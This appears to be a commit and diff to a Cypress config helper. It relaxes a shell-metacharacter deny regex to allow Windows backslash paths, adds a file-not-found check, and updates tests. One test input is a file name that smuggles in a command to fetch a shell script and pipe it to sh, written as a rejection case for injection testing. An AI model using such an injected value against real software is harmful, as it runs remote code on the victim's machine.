fix(security): allow Windows backslash paths and add file-not-found UX [APS-18613]

Address review feedback on PR #1080:

- Remove backslash (\) from DANGEROUS_PATH_CHARS regex so legitimate Windows
  absolute/relative paths (C:\Users\..., .\subdir\..., \\server\share\...) are
  no longer rejected. Backslash is a path separator on Windows, not a shell
  metacharacter — and the actual security boundary is execFileSync (no shell
  invocation), not the regex.

- Add an fs.existsSync() check inside loadJsFile() that throws a clear
  "Cypress config file not found at: <path>" error before invoking
  execFileSync. This is purely a UX improvement — existsSync alone would NOT
  prevent injection; the metacharacter regex + execFileSync remain the
  security guarantees.

- Update unit tests:
  * Add positive tests for Windows-style absolute, Program-Files (with
    spaces), relative (.\subdir\...) and UNC (\\server\share\...) paths
  * Add a positive test in loadJsFile that exercises the same Windows paths
    end-to-end without throwing
  * Add a test for the new file-not-found path that confirms execFileSync
    is NOT invoked when the file is missing
  * Update existsSync call-count assertion from calledOnce to calledTwice
    (UX check + cleanup unlink)

Resolves: APS-18613

Author: avinash-bharti

bin/helpers/readCypressConfigUtil.js

@@ -11,13 +11,17 @@ const logger = require('./logger').winstonLogger;
 // Defense-in-depth: reject file paths containing shell metacharacters.
 // This guards against command injection even if execFileSync is ever
 // replaced with a shell-based exec in the future.
-const DANGEROUS_PATH_CHARS = /[;"`$|&(){}\\]/;
+//
+// Note: backslash (\) is intentionally NOT included here because it is a
+// legitimate path separator on Windows (e.g. C:\Users\me\cypress.config.js).
+// The actual security boundary is execFileSync (no shell), not this regex.
+const DANGEROUS_PATH_CHARS = /[;"`$|&(){}]/;
 
 function validateFilePath(filepath) {
     if (DANGEROUS_PATH_CHARS.test(filepath)) {
         throw new Error(
             `Invalid cypress config file path: "${filepath}" contains disallowed characters. ` +
-            'File paths must not include shell metacharacters such as ; " ` $ | & ( ) { } \\'
+            'File paths must not include shell metacharacters such as ; " ` $ | & ( ) { }'
         );
     }
 }
@@ -205,6 +209,13 @@ exports.loadJsFile =  (cypress_config_filepath, bstack_node_modules_path) => {
     // Security: validate file path to reject shell metacharacters (defense-in-depth)
     validateFilePath(cypress_config_filepath);
 
+    // UX: surface a clear error if the cypress config file is missing.
+    // (This is purely a UX check — the security boundary is execFileSync above
+    // plus the metacharacter regex; existsSync alone would NOT prevent injection.)
+    if (!fs.existsSync(cypress_config_filepath)) {
+        throw new Error(`Cypress config file not found at: ${cypress_config_filepath}`);
+    }
+
     const require_module_helper_path = path.join(__dirname, 'requireModule.js')
 
     // Security fix: use execFileSync instead of execSync to avoid shell interpolation.

test/unit/bin/helpers/readCypressConfigUtil.js

@@ -49,6 +49,22 @@ describe("readCypressConfigUtil", () => {
             expect(() => readCypressConfigUtil.validateFilePath('path/to my project/cypress.config.js')).to.not.throw();
         });
 
+        it('should accept Windows absolute paths with backslashes', () => {
+            expect(() => readCypressConfigUtil.validateFilePath('C:\\Users\\test\\cypress.config.js')).to.not.throw();
+        });
+
+        it('should accept Windows absolute paths with spaces and backslashes (Program Files)', () => {
+            expect(() => readCypressConfigUtil.validateFilePath('C:\\Program Files\\my app\\cypress.config.js')).to.not.throw();
+        });
+
+        it('should accept Windows relative paths with backslashes', () => {
+            expect(() => readCypressConfigUtil.validateFilePath('.\\subdir\\cypress.config.js')).to.not.throw();
+        });
+
+        it('should accept UNC-style Windows paths', () => {
+            expect(() => readCypressConfigUtil.validateFilePath('\\\\server\\share\\cypress.config.js')).to.not.throw();
+        });
+
         it('should reject paths with semicolons (command injection)', () => {
             expect(() => readCypressConfigUtil.validateFilePath('cypress.config";curl localhost:8000/shell.sh|sh;".js'))
                 .to.throw(/disallowed characters/);
@@ -82,9 +98,9 @@ describe("readCypressConfigUtil", () => {
             const existsSyncStub = sandbox.stub(fs, 'existsSync').returns(true);
             const unlinkSyncSyncStub = sandbox.stub(fs, 'unlinkSync');
             const requireModulePath = path.join(__dirname, '../../../../', 'bin', 'helpers', 'requireModule.js');
-            
+
             const result =  readCypressConfigUtil.loadJsFile('path/to/cypress.config.ts', 'path/to/tmpBstackPackages');
-            
+
             expect(result).to.eql({ e2e: {} });
             // Verify execFileSync is called with 'node' as first arg and array of args
             sinon.assert.calledOnce(execFileStub);
@@ -94,7 +110,8 @@ describe("readCypressConfigUtil", () => {
             expect(execFileStub.getCall(0).args[2].env.NODE_PATH).to.eql('path/to/tmpBstackPackages');
             sinon.assert.calledOnce(readFileSyncStub);
             sinon.assert.calledOnce(unlinkSyncSyncStub);
-            sinon.assert.calledOnce(existsSyncStub);
+            // existsSync is now called twice: once for the file-not-found UX check, once for the unlink cleanup
+            sinon.assert.calledTwice(existsSyncStub);
         });
 
         it('should load js file using execFileSync on Windows too (no platform-specific branching needed)', () => {
@@ -115,7 +132,33 @@ describe("readCypressConfigUtil", () => {
             expect(execFileStub.getCall(0).args[2].env.NODE_PATH).to.eql('path/to/tmpBstackPackages');
             sinon.assert.calledOnce(readFileSyncStub);
             sinon.assert.calledOnce(unlinkSyncSyncStub);
-            sinon.assert.calledOnce(existsSyncStub);
+            // existsSync called twice: file-not-found UX check + unlink cleanup
+            sinon.assert.calledTwice(existsSyncStub);
+        });
+
+        it('should accept Windows-style absolute paths in loadJsFile (no rejection)', () => {
+            sandbox.stub(cp, "execFileSync").returns("random string");
+            sandbox.stub(fs, 'readFileSync').returns('{"e2e": {}}');
+            sandbox.stub(fs, 'existsSync').returns(true);
+            sandbox.stub(fs, 'unlinkSync');
+
+            // None of these should throw
+            expect(() => readCypressConfigUtil.loadJsFile('C:\\Users\\test\\cypress.config.js', 'path/to/tmpBstackPackages'))
+                .to.not.throw();
+            expect(() => readCypressConfigUtil.loadJsFile('C:\\Program Files\\my app\\cypress.config.js', 'path/to/tmpBstackPackages'))
+                .to.not.throw();
+            expect(() => readCypressConfigUtil.loadJsFile('.\\subdir\\cypress.config.js', 'path/to/tmpBstackPackages'))
+                .to.not.throw();
+        });
+
+        it('should throw a clear error when the cypress config file does not exist (UX)', () => {
+            sandbox.stub(fs, 'existsSync').returns(false);
+            const execFileStub = sandbox.stub(cp, "execFileSync");
+
+            expect(() => readCypressConfigUtil.loadJsFile('path/to/missing/cypress.config.js', 'path/to/tmpBstackPackages'))
+                .to.throw(/Cypress config file not found at:/);
+            // execFileSync must NOT be invoked when the file is missing
+            sinon.assert.notCalled(execFileStub);
         });
 
         it('should reject file paths containing command injection characters', () => {